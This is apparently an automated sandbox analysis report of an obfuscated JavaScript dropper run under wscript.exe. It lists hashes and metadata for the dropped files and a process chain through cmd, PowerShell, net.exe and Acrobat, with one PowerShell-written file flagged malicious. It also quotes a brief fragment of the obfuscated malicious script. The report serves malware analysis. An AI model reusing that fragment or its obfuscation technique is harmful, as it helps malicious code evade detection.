SSDEEP: | 6:YEQXJ2HXDX2RN5CNGnZiQ0YQZxoAvJfbPtdPeUkwRe9:YvXKXT5GcEGDV8Ukee9 |
MD5: | E4D350FEF72460E7DE8C4B6B0F5993E7 |
SHA1: | 1F6EDD556B00F79668CA14EA29B60279E6C85613 |
SHA-256: | 292AB10BA12E68E61C6EE972F3897B99A2A56A483E3E99359D431371D7EDD1A8 |
SHA-512: | D25BBF0124F51FF9425ABA28046F060804C9FB3C7B838242710463E3CC63C5B39119774C9BDB07BBC88A71A753681817C9D5CDF5E42B3F3F6079E7C6ED143C76 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.300526570470405 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXDX2RN5CNGnZiQ0YQZxoAvJf21rPeUkwRe9:YvXKXT5GcEG+16Ukee9 |
MD5: | 0773E5736FF039804BACA9A0A707C8F1 |
SHA1: | 87391DE9346E9553F4A648EA857EC9EBAD386E64 |
SHA-256: | B2CB4AF1C86003B8C0A545C8B4F7EB0579358267F22645BAE71B078D534B8502 |
SHA-512: | E5724A253CFBC0271EB5D0083A8AAA9E9DF43D317151DF2601D4641041A190AEC4E884719055CAF0E5288C16C8441129490D2DC8465EEE87AA3050E9AC6552E3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.6689066294931365 |
Encrypted: | false |
SSDEEP: | 24:Yv6XZBamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSj:YvMBgkDMUJUAh8cvMj |
MD5: | 759BBEC54833B7031836CE878741AAA8 |
SHA1: | 9B9E8578FBE2446546AFDE92A9DE5A23C0584E02 |
SHA-256: | C122FE94FAB283FA02C8A129E16D6FBE4428BDC848C9C66F094583BFE70C6F23 |
SHA-512: | 8C0E48E635A8AEF36CE3C3EDA06A6AF88B180943971E9A5A7206192BCEA73EE6F91B77714CC04E933466FC8523B01A782A92676B2A01893E55AA16813EE61063 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.276956407052182 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXDX2RN5CNGnZiQ0YQZxoAvJfshHHrPeUkwRe9:YvXKXT5GcEGUUUkee9 |
MD5: | 1889970A72C030E4CE415111C467C16B |
SHA1: | 795A0D116CEAF31C11F3E783454FE753FB9C49AC |
SHA-256: | D65AC2C6E4D5CBFBFD139931F51C189202D3C7B3CBF58C3E008A85DD6C107FC6 |
SHA-512: | F802663C1BF090E17C9B2D86FA812EF7281CF208B44FE6E085BF64A11D8450BC3F9C38D769F949FB144C48CC91AE619B8FEF5AF2529D1A1AC8AD0E972DFC9A06 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.289314202626715 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXDX2RN5CNGnZiQ0YQZxoAvJTqgFCrPeUkwRe9:YvXKXT5GcEGTq16Ukee9 |
MD5: | 8AF1CE0EA78DBF5114ADF0A499FF2D1C |
SHA1: | 3F2368D54FBE3329E5E9F75E3EC3EED17A57EE57 |
SHA-256: | 809F931F6062E136FAEA964EF666144E755F7347B3E4420D60B5965D4FF7711C |
SHA-512: | EAB1BFB3B2581F47F3EE6D7E0A8FF3116CB04EA7A113F3B8ECDF97C04E50A8EA0E6D1F46E777F6D3DCEB738F7455B270316F099B8EA600E7F5BCB2E94D67C80B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.143869636282662 |
Encrypted: | false |
SSDEEP: | 48:YTf+hcDIpgLJooKug3tIudjmh+k2ZS2u90D:8GCDIpgLJPtcRmQ5ZdUE |
MD5: | 7CA05C4FED8935D0258DAEEC312B965B |
SHA1: | 330A7F2733E724E99AB7F0040A3CF9D4123B6ECB |
SHA-256: | BC644900FF2CE2F5E4F9667358D3C28BD3F42E01FA21839467163BBEB0D37683 |
SHA-512: | C37EE9958AECCEE38EDEB50176C5F2CD3212465DD5559183AB5F168018DD28FB5F70C46327069B921AE6BCF0033C6CBA2879720ED101AB0861EBE7BCDDD6C477 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.146101802103029 |
Encrypted: | false |
SSDEEP: | 24:TLhx/XYKQvGJF7ursn6RZXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudc1:TFl2GL7msnkXc+XcGNFlRYIX2v3kmK |
MD5: | 7E325A79B7424C6CC02A980AE0C5910B |
SHA1: | 7FB2A048C67A1A9680F7F536946F6FB968D364CD |
SHA-256: | 123A0B3618FA19539D0283E6DBDD218DB40C730DB93A9BAF214CEDCB9183A200 |
SHA-512: | 998E787223C352F49AE138306139EDA050B693022B321F9C2A88E08D3D114315565D49A5C0246524B45D69F62DF061F478FF1A20012F3A3F03AEA5196A0CC0BB |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.5508098239425534 |
Encrypted: | false |
SSDEEP: | 24:7+t40g6UXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcHRuLux7vqLxx/z:7M4pzXc+XcGNFlRYIX2vGqVl2GL7msR |
MD5: | E2BD48429214F2BD2356EFE1E4802AFB |
SHA1: | 93B591B3376416379DB63B707995E0D1863464AC |
SHA-256: | 1B5F058F11EDA096685AC673CAB40FC9BF46B76BA4A74C5EB0E30C9D363C7B74 |
SHA-512: | 0117EB7D97DD9E0078CFC16BEFD06C3FD167A248CD3E191E060D0C11704E233ABC0E2787A48A2C58FDDE69658D7CC2661BB4A2AC08803EB90CE1BD67DFFA5FFF |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgihp1jXW4sKncvWBSqFsT7GfEaWe6Yyu:6a6TZ44ADEihjjmFKnqxqFge6K |
MD5: | 3423029701CDC20A500E7F394AD1EA63 |
SHA1: | D7F629535EA71BC0B94CA261D02219ED37293018 |
SHA-256: | 3F29662C124E75557DD60AD6680366123209A555734D583EE53B2181F5263091 |
SHA-512: | 73FCE2013601F2A31C9C529267DD95C7BEE948C4629F232FA6B67D5440723BFB2F8EA3797A0602FFEE007C736FFA98C658DF54A8A8AF54E60E58C6ABB791442B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:Nlllul3nqth:NllUa |
MD5: | 851531B4FD612B0BC7891B3F401A478F |
SHA1: | 483F0D1E71FB0F6EFF159AA96CC82422CF605FB3 |
SHA-256: | 383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F |
SHA-512: | A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.4953527754662135 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K88Cl+IlMH:Qw946cPbiOxDlbYnuRKdhY6 |
MD5: | 098E4EDB0B6FE36874991B7526AB40FC |
SHA1: | 018746C1A65C890E8D023AB40F1472E3FEBA4CFA |
SHA-256: | FD80C7EE38AAE05B2D224308321C466FC012B1125408BC435B383369167E2EAB |
SHA-512: | 96A97D781D6E5B65C7443DD3D7D61CB3DDA5443073EE5BEA2EB9ADF49402FFBFAB2724438691A77A8AEE418F321E26922CA413F7A25BB7FB53A49391CECF0C3D |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-11 03-02-46-274.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.338264912747007 |
Encrypted: | false |
SSDEEP: | 384:lH4ZASLaTgKoBKkrNdOZTfUY9/B6u6AJ8dbBNrSVNspYiz5LkiTjgjQLhDydAY8s:kIb |
MD5: | 128A51060103D95314048C2F32A15C66 |
SHA1: | EEB64761BE485729CD12BF4FBF7F2A68BA1AD7DB |
SHA-256: | 601388D70DFB723E560FEA6AE08E5FEE8C1A980DF7DF9B6C10E1EC39705D4713 |
SHA-512: | 55099B6F65D6EF41BC0C077BF810A13BA338C503974B4A5F2AA8EB286E1FCF49DF96318B1DA691296FB71AA8F2A2EA1406C4E86F219B40FB837F2E0BF208E677 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.353387389863844 |
Encrypted: | false |
SSDEEP: | 384:XYV+VaJfkvzMso5wz6VYiAVfYJ9m+bnAw2v8AUCaKaXCI3KqlhzEbEdQlbeqzHtC:oY3pE |
MD5: | 35928B74EDB8A044B40BED2BCDAC4B55 |
SHA1: | E04F912F8FB209D67C9A8022CC66C053F9145C52 |
SHA-256: | DA77F142B60B70B98519F9796A0FAB9811895F118E1FEE8A02B962FC117BDEE1 |
SHA-512: | 3E1780FDD4118839D174E9EC1B0B62B9531B72DC7A5216CE2A91B53178D7D58DDB136D5BBB0D487BB394946531B6369196CD4039D39314597CE5A38B5705CFEA |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.397208311587601 |
Encrypted: | false |
SSDEEP: | 192:acb4I3dcbPcbaIO4cbYcbqnIdjcb6acbaIewcbycboIH9cbh:V3fOCIdJDe3HC |
MD5: | 4DE844F67BDDE04584E49E4B7EF0E8CA |
SHA1: | 1FD6A0D803F28A2F146930E17B9B74385781C2B0 |
SHA-256: | 87A7D237417877FBBFCE85F7256070FA2D18B1AC35EC1E6848235F766DFBF2F6 |
SHA-512: | 779688FCA0CF03C571002C52BA001E0735CEE9475E04ED1961A9D0E0C3BC2D15508161F9320A2B02063D8872FA64055302B4375981F7A5B4C77318EF6112F2E3 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/xaWL07oSwYIGNPUGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JaWLxSwZG6GZn3mlind9i4ufFXpAXkru |
MD5: | C267C8C3D4A0DBACC06F3737E1784EB3 |
SHA1: | D798A10176D979377257977E896C8D332B785F23 |
SHA-256: | B5B5EF233AADF8F9C3509CDE98C7A9885D0E1B4938CD2A0676170BC8B30855F4 |
SHA-512: | 3C9CC6700F7827321C0DEADA8F8517F8BAAB6056AF3D7FDAA71BF258C58399EDFDA8601AEBAEEBAB36EF0B1F59BA3E9690EEC2ACD2B8E3A94C8A328261D55D16 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo |
MD5: | A0CFC77914D9BFBDD8BC1B1154A7B364 |
SHA1: | 54962BFDF3797C95DC2A4C8B29E873743811AD30 |
SHA-256: | 81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685 |
SHA-512: | 74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.889055103751261 |
TrID: | |
File name: | 2014717258213104107.js |
File size: | 21'226 bytes |
MD5: | 42b3e4cd2aa11f08d532871e8f4f42fe |
SHA1: | d8b43659f4af1f5e74ad459adb0f0a85b8e82872 |
SHA256: | 83ae0da9bad972224ae47f943f4861b747bee011349746388b9c29b47c7edce1 |
SHA512: | 9d2d7e068cf727378419faeed408365a0a3fa06f71290863088813ae98d919b7d99f914ff75a3eabb125ca7f99499789a98a4f4b4a02736294f4b8e07d0e1e00 |
SSDEEP: | 192:KeEU980ULQtLCQl49F0ZfY7S6DloZIVwvwTKPg3PqmPmK1BTDQBomJWR8ONzlguV:zEU20iQR9l41/VwITEmPXodJ2 |
TLSH: | 7F92A8406C82BFE196EC08F36D9315F5A749128CE885B6CABD85D4C4527873991CE3FE |
File Content Preview: | function xgzuk(){pninrv=[1031,3079,5127,4103,2055,3072];var apgdzni=this[qfmhy+sktzw+enqjy+yajshdq+xjtgjhjm+eikgmwjf+cgvit+uyurg](this[nhfbdl+pvgizguy+hinppg+enqjy+wnuyo+qfmhy+uyurg][wakkrl+enqjy+xjtgjhjm+sktzw+uyurg+xjtgjhjm+kkgxi+eagpyeo+axkoxpkww+xjtgj |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 03:02:37 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff705fc0000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 03:02:38 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70acc0000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 03:02:38 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff66e660000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 03:02:38 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6e3d50000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 03:02:43 |
Start date: | 11/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff651090000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 6 |
Start time: | 03:02:43 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70acc0000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 03:02:43 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7b9230000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 03:02:43 |
Start date: | 11/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70df30000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
Start time: | 03:02:43 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7403e0000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 10 |
Start time: | 03:02:44 |
Start date: | 11/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70df30000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function xgzuk() { |
|
1 | pninrv = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
